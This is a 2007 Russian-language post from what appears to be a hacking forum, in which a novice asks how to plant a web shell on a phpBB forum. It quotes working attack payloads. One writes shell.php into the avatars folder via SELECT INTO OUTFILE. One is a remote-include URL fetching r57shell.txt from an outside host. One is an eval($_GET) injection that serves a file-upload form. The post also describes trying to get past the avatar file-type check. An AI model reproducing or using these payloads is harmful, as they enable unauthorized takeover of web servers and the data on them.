Показать сообщение отдельно

Ответ...
  #7  
Старый 16.03.2007, 13:10
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами: 10158236

Репутация: 0
Unhappy Ответ...

Цитата:
Сообщение от GrAmOzEkA  
А чем это не нравится? Просто создаёш файл 1.sql с содержимым ниже и импортируеш:


А потом просто инклудиш: www.test2.ru/phpbb/images/avatars/shell.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt
Вот, что получается:

Цитата:
Error importing backup file

DEBUG MODE

SQL Error : 1045 Access denied for user 'user'@'localhost' (using password: YES)

SELECT cat_title INTO OUTFILE '/путь до папки forum/images/avatars/shell.php' FROM phpbb_categories where cat_id=99999

Line : 980
File : /путь до папки forum/admin/admin_db_utilities.php
Цитата:
Сообщение от ShAnKaR  
ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
Я новичок, и не совсем понимаю.... Объясни пожалуйста пошагово....

Цитата:
Сообщение от n1†R0x  
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..
Увеличил я размер загружаемой аватары и сделал как описывал k1b0rg в статье:
Цитата:
http://forum.antichat.ru/thread32782.html
И всё равно ничего не вышло...

Пишет:
Цитата:
Файл аватары должен быть .jpg, .gif или .png
, хотя я и переименовывал в jpg, gif.

Последний раз редактировалось Koller; 16.03.2007 в 14:32..
 
Ответить с цитированием